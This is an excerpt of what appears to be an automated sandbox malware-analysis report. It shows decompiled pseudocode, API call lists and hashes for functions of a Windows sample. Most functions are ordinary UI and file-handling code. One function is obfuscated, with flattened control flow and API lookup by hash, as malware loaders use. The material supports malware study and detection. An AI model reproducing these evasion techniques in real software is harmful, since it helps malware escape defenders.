					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
					E00416AEC(_t53 + 8);
					_t36 = 0;
				} else {
					lstrcpynA(_t47,  *(_t53 + 0xc), 0x104);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t36;
			}

0x00417b2e
0x00417b3b
0x00417b54
0x00417b68
0x00417b6d
0x00417b75
0x00417b77
0x00417b7a
0x00417b97
0x00417b9d
0x00417ba0
0x00417ba0
0x00417baa
0x00417bb6
0x00417bbf
0x00417bc2
0x00417bd2
0x00417bd2
0x00417bbf
0x00417bd8
0x00417bda
0x00417bda
0x00417bdb
0x00417be2
0x00417be7
0x00417b56
0x00417b5b
0x00417b61
0x00417b61
0x00417bee
0x00417bf6

APIs

__EH_prolog.LIBCMT ref: 00417B2E
GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 00417B4C
lstrcpynA.KERNEL32(?,?,00000104), ref: 00417B5B
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00417B8F
CharUpperA.USER32(?), ref: 00417BA0
FindFirstFileA.KERNEL32(?,?), ref: 00417BB6
FindClose.KERNEL32(00000000), ref: 00417BC2
lstrcpyA.KERNEL32(?,?), ref: 00417BD2

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Find$CharCloseFileFirstFullH_prologInformationNamePathUpperVolumelstrcpylstrcpyn
String ID:
API String ID: 304730633-0
Opcode ID: 261e5bd0cefbd8535663fbc44468f2c19afaa9a971ae4ca057a15bc10e8a79cd
Instruction ID: d6ea0ce2269d815b5d4983ac84d4510317191ca485f23a24ef5020b763cd6ff7
Opcode Fuzzy Hash: 261e5bd0cefbd8535663fbc44468f2c19afaa9a971ae4ca057a15bc10e8a79cd
Instruction Fuzzy Hash: 71215C71A04119ABCB209F61DC48EEF7F7CEF05768F008166F919E61A0D7349A46CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041E95F, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160
keyboardtimeCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0041E95F(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				struct tagPOINT _v28;
				intOrPtr _v36;
				signed char _v65;
				char _v72;
				void* _t58;
				void* _t60;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr* _t113;

				_t110 = _a4;
				_t113 = __ecx;
				if(E00414007(__ecx, _t110) != 0) {
					L38:
					_t58 = 1;
					return _t58;
				}
				_t111 =  *((intOrPtr*)(_t110 + 4));
				_v20 = E00404FFE(__ecx);
				if(( *(__ecx + 0x64) & 0x00000020) != 0 || _t111 == 0x201 || _t111 == 0x202) {
					if(_t111 < 0x200 || _t111 > 0x209) {
						if(_t111 < 0xa0 || _t111 > 0xa9) {
							goto L30;
						} else {
							goto L8;
						}
					} else {
						L8:
						_v16 = E004249C4();
						_t67 = _a4;
						_v28.y =  *((intOrPtr*)(_t67 + 0x18));
						_v28.x =  *(_t67 + 0x14);
						ScreenToClient( *(_t113 + 0x1c),  &_v28);
						E00406330( &_v72, 0, 0x2c);
						_v72 = 0x28;
						_v8 =  *((intOrPtr*)( *_t113 + 0x64))(_v28.x, _v28.y,  &_v72);
						if(_v36 != 0xffffffff) {
							E004062E0(_v36);
						}
						if(_t111 != 0x201 || (_v65 & 0x00000080) == 0) {
							_v12 = _v12 & 0x00000000;
							if(_t111 != 0x201 && GetKeyState(1) < 0) {
								_v8 =  *((intOrPtr*)(_v16 + 0x104));
							}
						} else {
							_v12 = 1;
						}
						if(_v8 < 0 || _v12 != 0) {
							if(GetKeyState(1) >= 0 || _v12 != 0) {
								 *((intOrPtr*)( *_t113 + 0xdc))(0xffffffff);
								KillTimer( *(_t113 + 0x1c), 0xe001);
							}
							goto L29;
						} else {
							if(_t111 != 0x202) {
								if(( *(_t113 + 0x60) & 0x00000008) != 0 || GetKeyState(1) < 0) {
									 *((intOrPtr*)( *_t113 + 0xdc))(_v8);
								} else {
									if(_v8 ==  *((intOrPtr*)(_v16 + 0x104))) {
										L29:
										 *((intOrPtr*)(_v16 + 0x104)) = _v8;
										goto L30;
									}
									_push(0x12c);
									_push(0xe000);
									L20:
									E0041E722(_t113);
								}
								goto L29;
							}
							 *((intOrPtr*)( *_t113 + 0xdc))(0xffffffff);
							_push(0xc8);
							_push(0xe001);
							goto L20;
						}
					}
				} else {
					L30:
					_t60 = E00414DCC(_t113);
					if(_t60 == 0 ||  *((intOrPtr*)(_t60 + 0x50)) == 0) {
						if(_v20 == 0) {
							L36:
							return E00415EEB(_a4);
						} else {
							goto L34;
						}
						while(1) {
							L34:
							_t112 = _v20;
							_push(_a4);
							if( *((intOrPtr*)( *_v20 + 0x90))() != 0) {
								goto L38;
							}
							_t64 = E00414C6C(_t112);
							_v20 = _t64;
							if(_t64 != 0) {
								continue;
							}
							goto L36;
						}
						goto L38;
					} else {
						return 0;
					}
				}
			}

0x0041e967
0x0041e96a
0x0041e974
0x0041eb53
0x0041eb55
0x00000000
0x0041eb55
0x0041e97a
0x0041e989
0x0041e991
0x0041e9a9
0x0041e9b9
0x00000000
0x00000000
0x00000000
0x00000000
0x0041e9cb
0x0041e9cb
0x0041e9d0
0x0041e9d3
0x0041e9dc
0x0041e9e3
0x0041e9e9
0x0041e9f7
0x0041ea04
0x0041ea1b
0x0041ea1e
0x0041ea23
0x0041ea28
0x0041ea2b
0x0041ea3c
0x0041ea42
0x0041ea5a
0x0041ea5a
0x0041ea33
0x0041ea33
0x0041ea33
0x0041ea61
0x0041ead7
0x0041eae5
0x0041eaf3
0x0041eaf3
0x00000000
0x0041ea69
0x0041ea6f
0x0041ea94
0x0041eac4
0x0041eaa3
0x0041eaaf
0x0041eaf9
0x0041eaff
0x00000000
0x0041eaff
0x0041eab1
0x0041eab6
0x0041ea87
0x0041ea89
0x0041ea89
0x00000000
0x0041ea94
0x0041ea77
0x0041ea7d
0x0041ea82
0x00000000
0x0041ea82
0x0041ea61
0x0041eb05
0x0041eb05
0x0041eb07
0x0041eb0f
0x0041eb1f
0x0041eb43
0x00000000
0x00000000
0x00000000
0x00000000
0x0041eb21
0x0041eb21
0x0041eb21
0x0041eb24
0x0041eb33
0x00000000
0x00000000
0x0041eb37
0x0041eb3e
0x0041eb41
0x00000000
0x00000000
0x00000000
0x0041eb41
0x00000000
0x0041eb17
0x00000000
0x0041eb17
0x0041eb0f

APIs

Part of subcall function 00404FFE: GetParent.USER32(?), ref: 00405008

ScreenToClient.USER32 ref: 0041E9E9
GetKeyState.USER32(00000001), ref: 0041EA46
GetKeyState.USER32(00000001), ref: 0041EA98
GetKeyState.USER32(00000001), ref: 0041EACE
KillTimer.USER32(?,0000E001), ref: 0041EAF3

Strings

(, xrefs: 0041EA04

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: State$ClientKillParentScreenTimer
String ID: (
API String ID: 2757461879-3887548279
Opcode ID: aba9d6d1a86e02e609d0b99a16c65b662d614ef0cbda091ee331dfe992392d8b
Instruction ID: 933066e1b9ae1ffc9999b2effe157d6391a28475e321b0032f1d86925bea9953
Opcode Fuzzy Hash: aba9d6d1a86e02e609d0b99a16c65b662d614ef0cbda091ee331dfe992392d8b
Instruction Fuzzy Hash: 09518179A00205DBDF24DB96C488BEE7BB1AF44354F14006AED16A72D1C7B869C2CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00418C88, Relevance: 10.6, APIs: 7, Instructions: 148
timeCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00418C88(void* __ecx) {
				void* __esi;
				void* _t60;
				CHAR* _t83;
				void* _t95;
				struct _SECURITY_DESCRIPTOR* _t101;
				signed int _t102;
				void* _t120;
				CHAR** _t124;
				void* _t126;

				E00406520(E00429FC8, _t126);
				_t120 = __ecx;
				_t124 = __ecx + 0x10;
				E00416A77(_t124, _t124);
				if(( *(_t126 + 0xd) & 0x00000010) != 0 && E004182CC( *(_t126 + 8), _t126 - 0x150) != 0) {
					_t83 =  *0x436980; // 0x436994
					 *(_t126 - 0x10) = _t83;
					_t102 = 0;
					_push(_t126 - 0x10);
					 *(_t126 - 4) = 0;
					E00417BF9(_t126,  *(_t126 + 8));
					if(GetDiskFreeSpaceA( *(_t126 - 0x10), _t126 - 0x24, _t126 - 0x20, _t126 - 0x1c, _t126 - 0x28) != 0) {
						_t102 =  *(_t126 - 0x24) *  *(_t126 - 0x20) *  *(_t126 - 0x1c);
					}
					_t91 =  *((intOrPtr*)(_t126 - 0x144));
					_t136 = _t102 -  *((intOrPtr*)(_t126 - 0x144)) + _t91;
					if(_t102 >  *((intOrPtr*)(_t126 - 0x144)) + _t91) {
						_push(1);
						_push( *(_t126 + 8));
						_push(_t126 - 0x14);
						_t95 = E00418BE2(_t136);
						 *(_t126 - 4) = 1;
						E00416B95(_t124, _t126, _t95);
						 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
						E00416AEC(_t126 - 0x14);
					}
					 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
					E00416AEC(_t126 - 0x10);
				}
				_t58 =  *_t124;
				if( *((intOrPtr*)( *_t124 - 8)) == 0 || E004177BD(_t120, _t58,  *(_t126 + 0xc),  *((intOrPtr*)(_t126 + 0x10))) == 0) {
					E00416A77(_t124, _t124);
					_t60 = E004177BD(_t120,  *(_t126 + 8),  *(_t126 + 0xc),  *((intOrPtr*)(_t126 + 0x10)));
				} else {
					E00416BE5(_t120 + 0xc,  *(_t126 + 8));
					if(GetFileTime( *(_t120 + 4), _t126 - 0x18, _t126 - 0x30, _t126 - 0x38) != 0) {
						E0041837E(_t126 - 0x150, _t126 - 0x18);
						SetFileTime( *(_t120 + 4), _t126 - 0x18, _t126 - 0x30, _t126 - 0x38);
					}
					 *(_t126 + 0xc) = 0;
					if(GetFileSecurityA( *(_t126 + 8), 4, 0, 0, _t126 + 0xc) != 0) {
						_t101 = E004131DD( *(_t126 + 0xc));
						if(GetFileSecurityA( *(_t126 + 8), 4, _t101,  *(_t126 + 0xc), _t126 + 0xc) != 0) {
							SetFileSecurityA( *_t124, 4, _t101);
						}
						E00413206(_t101);
					}
					_t60 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t126 - 0xc));
				return _t60;
			}

0x00418c8d
0x00418c9b
0x00418c9d
0x00418ca2
0x00418cab
0x00418cc8
0x00418ccd
0x00418cd3
0x00418cd5
0x00418cd6
0x00418cdc
0x00418cfc
0x00418d05
0x00418d05
0x00418d09
0x00418d11
0x00418d13
0x00418d15
0x00418d1a
0x00418d1d
0x00418d1e
0x00418d29
0x00418d2d
0x00418d32
0x00418d39
0x00418d39
0x00418d3e
0x00418d45
0x00418d45
0x00418d4a
0x00418d51
0x00418e09
0x00418e19
0x00418d6d
0x00418d73
0x00418d8f
0x00418d9c
0x00418db2
0x00418db2
0x00418dc9
0x00418dd0
0x00418dda
0x00418dee
0x00418df5
0x00418df5
0x00418dfc
0x00418e01
0x00418e04
0x00418e04
0x00418e24
0x00418e2c

APIs

__EH_prolog.LIBCMT ref: 00418C8D
GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?,?,?), ref: 00418CF4
GetFileTime.KERNEL32(?,?,?,?,?), ref: 00418D87
SetFileTime.KERNEL32(?,?,?,?), ref: 00418DB2
GetFileSecurityA.ADVAPI32(?,00000004,00000000,00000000,?), ref: 00418DCC
GetFileSecurityA.ADVAPI32(?,00000004,00000000,?,?), ref: 00418DEA
SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00418DF5

Part of subcall function 00417BF9: lstrcpynA.KERNEL32(00000000,?,00000104,?,?), ref: 00417C20

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: File$Security$Time$DiskFreeH_prologSpacelstrcpyn
String ID:
API String ID: 726943650-0
Opcode ID: 151eda710a63fa4e8bb76486b1b12dbcba71fe74a8807c483a8701459e66d7e6
Instruction ID: be22718d3dfdaed04fc9161a777cdf82254a032ef9ddc828293ac01cd1254a92
Opcode Fuzzy Hash: 151eda710a63fa4e8bb76486b1b12dbcba71fe74a8807c483a8701459e66d7e6
Instruction Fuzzy Hash: DD513BB2600209AFDF11EFA1DC85EEEBB7CFF04354F00802AF915A6191DB35DA958B64

Uniqueness

Uniqueness Score: -1.00%

Function 00422488, Relevance: 10.6, APIs: 7, Instructions: 67
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00422488(void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				long _t24;
				void* _t29;
				int _t32;
				struct HWND__* _t36;

				_push(__ecx);
				_t29 = __ecx;
				if(GetKeyState(0x11) < 0) {
					_push(8);
					_pop(0);
				}
				if(GetKeyState(0x10) < 0) {
					_push(4);
					_pop(0);
				}
				_t36 = GetFocus();
				_v8 = GetDesktopWindow();
				if(_t36 != 0) {
					_t32 = _a4 << 0x10;
					do {
						_t24 = SendMessageA(_t36, 0x20a, _t32, _a8);
						_t36 = GetParent(_t36);
					} while (_t24 == 0 && _t36 != 0 && _t36 != _v8);
				} else {
					_t24 = SendMessageA( *(_t29 + 0x1c), 0x20a, _a4 << 0x10, _a8);
				}
				return _t24;
			}

0x0042248b
0x00422495
0x0042249e
0x004224a0
0x004224a2
0x004224a2
0x004224ae
0x004224b0
0x004224b2
0x004224b2
0x004224bf
0x004224c9
0x004224cc
0x004224f8
0x004224fa
0x0042250b
0x00422515
0x00422515
0x004224ce
0x004224eb
0x004224eb
0x00422528

APIs

GetKeyState.USER32(00000011), ref: 00422499
GetKeyState.USER32(00000010), ref: 004224A9
GetFocus.USER32(?,?,?,00000098), ref: 004224B9
GetDesktopWindow.USER32 ref: 004224C1
SendMessageA.USER32 ref: 004224E5
SendMessageA.USER32 ref: 00422504
GetParent.USER32(00000000), ref: 0042250D

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MessageSendState$DesktopFocusParentWindow
String ID:
API String ID: 4150626516-0
Opcode ID: b8e35de3de85cc4ca708d73bd46ae120fcf3247ce85a6db4a513c4a3f9181852
Instruction ID: 20f266b1a498cc3956224d16169f9dc1dc704df93882e012ad9005a8c3fefddb
Opcode Fuzzy Hash: b8e35de3de85cc4ca708d73bd46ae120fcf3247ce85a6db4a513c4a3f9181852
Instruction Fuzzy Hash: A4110D32B00334BFEB502BA5AD48EAA7798EB14794F904137FE41D7250DBF49C4256E4

Uniqueness

Uniqueness Score: -1.00%

Function 00422473, Relevance: 7.6, APIs: 5, Instructions: 52
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00422473(void* __eax, void* __ebx, void* __edx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				long _t33;
				void* _t40;
				int _t43;
				struct HWND__* _t47;
				void* _t49;

				 *((intOrPtr*)(_t49 + __eax + 0x6a)) =  *((intOrPtr*)(_t49 + __eax + 0x6a)) + __edx;
				 *((intOrPtr*)(__eax - 0x15)) =  *((intOrPtr*)(__eax - 0x15)) + __ebx;
				_push(_t49);
				_push(0x98);
				_push(__ebx);
				_t40 = 0x98;
				if(GetKeyState(0x11) < 0) {
					_push(8);
					_pop(0);
				}
				if(GetKeyState(0x10) < 0) {
					_push(4);
					_pop(0);
				}
				_t47 = GetFocus();
				_v8 = GetDesktopWindow();
				if(_t47 != 0) {
					_t43 = _a4 << 0x10;
					do {
						_t33 = SendMessageA(_t47, 0x20a, _t43, _a8);
						_t47 = GetParent(_t47);
					} while (_t33 == 0 && _t47 != 0 && _t47 != _v8);
				} else {
					_t33 = SendMessageA( *(_t40 + 0x1c), 0x20a, _a4 << 0x10, _a8);
				}
				return _t33;
			}

0x00422478
0x0042247c
0x00422488
0x0042248b
0x0042248c
0x00422495
0x0042249e
0x004224a0
0x004224a2
0x004224a2
0x004224ae
0x004224b0
0x004224b2
0x004224b2
0x004224bf
0x004224c9
0x004224cc
0x004224f8
0x004224fa
0x0042250b
0x00422515
0x00422515
0x004224ce
0x004224eb
0x004224eb
0x00422528

APIs

GetKeyState.USER32(00000011), ref: 00422499
GetKeyState.USER32(00000010), ref: 004224A9
GetFocus.USER32(?,?,?,00000098), ref: 004224B9
GetDesktopWindow.USER32 ref: 004224C1
SendMessageA.USER32 ref: 004224E5

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: State$DesktopFocusMessageSendWindow
String ID:
API String ID: 2814764316-0
Opcode ID: c3de53c5a3b934d276908d7c7df658ce1646e09da35e5cf36f041f9f8bba838b
Instruction ID: b57d560b4246ca497f525dd7341a5897b5c585060d52b80c51f82830bbc2b57b
Opcode Fuzzy Hash: c3de53c5a3b934d276908d7c7df658ce1646e09da35e5cf36f041f9f8bba838b
Instruction Fuzzy Hash: 4C012032B003257FEB102B94ED45FA97798EB147A4F904437FE42D7191EAF8AC4396A4

Uniqueness

Uniqueness Score: -1.00%

Function 021E7740, Relevance: 6.5, Strings: 5, Instructions: 224
COMMONCrypto

Download Yara Rule

C-Code - Quality: 60%

			E021E7740() {
				void* __ebx;
				void* __ebp;
				intOrPtr* _t84;
				signed int _t85;
				signed int _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				void* _t101;
				signed int _t106;
				void* _t117;
				intOrPtr* _t147;
				intOrPtr _t149;
				intOrPtr* _t152;
				intOrPtr _t158;
				short* _t160;
				void* _t164;
				void* _t166;
				void* _t172;
				void* _t177;
				void* _t179;

				 *(_t177 + 0x14) = 0xad9f;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) | 0x55c37b00;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) ^ 0xd5c3ff9e;
				 *(_t177 + 0x10) = 0x20cd;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) << 9;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) ^ 0x00419a00;
				 *(_t177 + 4) = 0x7d7a;
				_push(_t117);
				 *(_t177 + 0x14) =  *(_t177 + 4) * 0x25;
				_t172 = 0;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) >> 0xa;
				_t164 = 0x37433c74;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) | 0x2c89345e;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) << 7;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) << 7;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) ^ 0x4d378000;
				 *(_t177 + 0x18) = 0xca95;
				 *(_t177 + 0x18) =  *(_t177 + 0x18) + 0xcbf5;
				 *(_t177 + 0x18) =  *(_t177 + 0x18) | 0x7c83d5b7;
				 *(_t177 + 0x18) =  *(_t177 + 0x18) ^ 0x6758ba30;
				 *(_t177 + 0x18) =  *(_t177 + 0x18) ^ 0x1bdb6d8d;
				 *(_t177 + 0x10) = 0xd33c;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) << 9;
				_t158 =  *((intOrPtr*)(_t177 + 0x2c));
				 *(_t177 + 0x10) = 0x38e38e39 *  *(_t177 + 0x10) >> 0x20 >> 1;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) ^ 0xe07bc090;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) * 0x69;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) << 1;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) << 0xb;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) ^ 0x0df2b000;
				 *(_t177 + 0x1c) = 0xac79;
				 *(_t177 + 0x1c) =  *(_t177 + 0x1c) << 1;
				 *(_t177 + 0x1c) =  *(_t177 + 0x1c) + 0x2d22;
				 *(_t177 + 0x1c) =  *(_t177 + 0x1c) ^ 0x00018615;
				goto L1;
				do {
					while(1) {
						L1:
						_t179 = _t164 - 0x2d3069ff;
						if(_t179 <= 0) {
							break;
						}
						if(_t164 == 0x342fd613) {
							_t160 =  *0x21ee2ec + 0x278;
							while( *_t160 != 0x5c) {
								_t160 = _t160 + 2;
							}
							_t158 = _t160 + 2;
							_t164 = 0x2685696e;
							continue;
						} else {
							if(_t164 != 0x37433c74) {
								goto L9;
							} else {
								_t164 = 0x194519ad;
								continue;
							}
						}
						L32:
					}
					if(_t179 == 0) {
						_t84 =  *0x21ee024;
						if(_t84 == 0) {
							_t84 = E021E3E80(_t117, E021E3F20(0xbb398380), 0x5262aefc, _t172);
							 *0x21ee024 = _t84;
						}
						_t85 =  *_t84(_t177 + 0x30);
						_t147 =  *0x21ee194;
						 *((intOrPtr*)(_t177 + 0x2c)) = 2 + _t85 * 2;
						if(_t147 == 0) {
							_t147 = E021E3E80(_t117, E021E3F20(0x667fdee), 0x1595373a, _t172);
							 *0x21ee194 = _t147;
						}
						_t89 =  *_t147( *((intOrPtr*)(_t177 + 0x3c)), _t158,  *(_t177 + 0x18),  *((intOrPtr*)(_t177 + 0x20)), _t177 + 0x30,  *((intOrPtr*)(_t177 + 0x2c)));
						_t164 = 0x1ff1a285;
						asm("sbb ebp, ebp");
						_t172 =  ~_t89 + 1;
						goto L1;
					} else {
						if(_t164 == 0x194519ad) {
							_t166 = E021E34C0(0x21ed8f0);
							_t91 =  *0x21edc60;
							if(_t91 == 0) {
								_t91 = E021E3E80(_t117, E021E3F20(0xe66945e6), 0xcca28b0d, _t172);
								 *0x21edc60 = _t91;
							}
							_t149 =  *0x21ee2ec;
							 *_t91(_t177 + 0x3c, 0x104, _t166, _t149 + 0x5c, _t149 + 0x278);
							_t93 =  *0x21edea8;
							_t177 = _t177 + 0x14;
							if(_t93 == 0) {
								_t93 = E021E3E80(_t117, E021E3F20(0xbb398380), 0x97f883e, _t172);
								 *0x21edea8 = _t93;
							}
							_t117 =  *_t93();
							_t95 =  *0x21ee1a0;
							if(_t95 == 0) {
								_t95 = E021E3E80(_t117, E021E3F20(0xbb398380), 0x26c3f343, _t172);
								 *0x21ee1a0 = _t95;
							}
							 *_t95(_t117, 0, _t166);
							_t164 = 0x342fd613;
							goto L1;
						} else {
							if(_t164 == 0x1ff1a285) {
								_t97 =  *0x21edfc4; // 0x0
								if(_t97 == 0) {
									_t97 = E021E3E80(_t117, E021E3F20(0x667fdee), 0x217c84a0, _t172);
									 *0x21edfc4 = _t97;
								}
								 *_t97( *((intOrPtr*)(_t177 + 0x28)));
								return _t172;
							} else {
								if(_t164 == 0x2685696e) {
									_t101 = E021E34C0(0x21ed960);
									_t152 =  *0x21edbec; // 0x0
									_t117 = _t101;
									if(_t152 == 0) {
										_t152 = E021E3E80(_t117, E021E3F20(0x667fdee), 0x7aac94ee, _t172);
										 *0x21edbec = _t152;
									}
									_t106 =  *_t152( *((intOrPtr*)(_t177 + 0x40)), _t117,  *((intOrPtr*)(_t177 + 0x34)), 0,  *(_t177 + 0x1c),  *(_t177 + 0x18), 0, _t177 + 0x28, 0);
									asm("sbb esi, esi");
									_t164 = ( ~_t106 & 0x09cffb0d) + 0x2d3069ff;
									E021E3460(_t117);
								}
								goto L9;
							}
						}
					}
					goto L32;
					L9:
				} while (_t164 != 0x3700650c);
				return _t172;
				goto L32;
			}

0x021e7746
0x021e774e
0x021e7756
0x021e775e
0x021e7766
0x021e776b
0x021e7773
0x021e7780
0x021e7784
0x021e7788
0x021e778a
0x021e778f
0x021e7794
0x021e779c
0x021e77a8
0x021e77b1
0x021e77b9
0x021e77c1
0x021e77c9
0x021e77d1
0x021e77d9
0x021e77e1
0x021e77e9
0x021e77f4
0x021e77fa
0x021e77fe
0x021e780b
0x021e780f
0x021e7813
0x021e7818
0x021e7820
0x021e7828
0x021e782c
0x021e7834
0x021e7834
0x021e7840
0x021e7840
0x021e7840
0x021e7840
0x021e7846
0x00000000
0x00000000
0x021e7a37
0x021e7a55
0x021e7a5f
0x021e7a61
0x021e7a64
0x021e7a6a
0x021e7a6d
0x00000000
0x021e7a39
0x021e7a3f
0x00000000
0x021e7a45
0x021e7a45
0x00000000
0x021e7a45
0x021e7a3f
0x00000000
0x021e7a37
0x021e784c
0x021e79a7
0x021e79ae
0x021e79c1
0x021e79c6
0x021e79c6
0x021e79d0
0x021e79d2
0x021e79df
0x021e79e5
0x021e79fd
0x021e79ff
0x021e79ff
0x021e7a1e
0x021e7a22
0x021e7a29
0x021e7a2b
0x00000000
0x021e7852
0x021e7858
0x021e7904
0x021e7906
0x021e790d
0x021e7920
0x021e7925
0x021e7925
0x021e792a
0x021e7946
0x021e7948
0x021e794d
0x021e7952
0x021e7965
0x021e796a
0x021e796a
0x021e7971
0x021e7973
0x021e797a
0x021e798d
0x021e7992
0x021e7992
0x021e799b
0x021e799d
0x00000000
0x021e785e
0x021e7864
0x021e7a77
0x021e7a7e
0x021e7a91
0x021e7a96
0x021e7a96
0x021e7a9f
0x021e7aad
0x021e786a
0x021e7870
0x021e7877
0x021e787c
0x021e7882
0x021e7886
0x021e789e
0x021e78a0
0x021e78a0
0x021e78c6
0x021e78ce
0x021e78d6
0x021e78dc
0x021e78dc
0x00000000
0x021e7870
0x021e7864
0x021e7858
0x00000000
0x021e78e1
0x021e78e1
0x021e78f9
0x00000000

Strings

z}, xrefs: 021E7773
t<C7, xrefs: 021E7A39
t<C7, xrefs: 021E778F
Ei, xrefs: 021E790F
"-, xrefs: 021E782C

Memory Dump Source

Source File: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Offset: 021E0000, based on PE: true

Associated: 00000000.00000002.231376146.00000000021E0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231395549.00000000021ED000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231403140.00000000021F0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21e0000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID: "-$t<C7$t<C7$z}$Ei
API String ID: 0-1832362217
Opcode ID: 2d9207e839275da65ae99f4588a3ea232fec457f64f280301f7eb5eeb3f148fd
Instruction ID: 75d396a861e95aaaf2a4602e7776828a8b02cd52a805ee2308c05b94a2de54fa
Opcode Fuzzy Hash: 2d9207e839275da65ae99f4588a3ea232fec457f64f280301f7eb5eeb3f148fd
Instruction Fuzzy Hash: 1681D031A447029FDB18EFA4EC44A2BB7E6ABC4704F04496DF4669B284E770DD49CB83

Uniqueness

Uniqueness Score: -1.00%

Function 0041580E, Relevance: 6.0, APIs: 4, Instructions: 38
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041580E(void* __ecx) {
				void* _t11;
				void* _t12;
				void* _t16;

				_t12 = __ecx;
				if((E00416528(__ecx) & 0x40000000) != 0) {
					L6:
					return E004136A7(_t12);
				}
				_t16 = E00404DAE();
				if(_t16 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
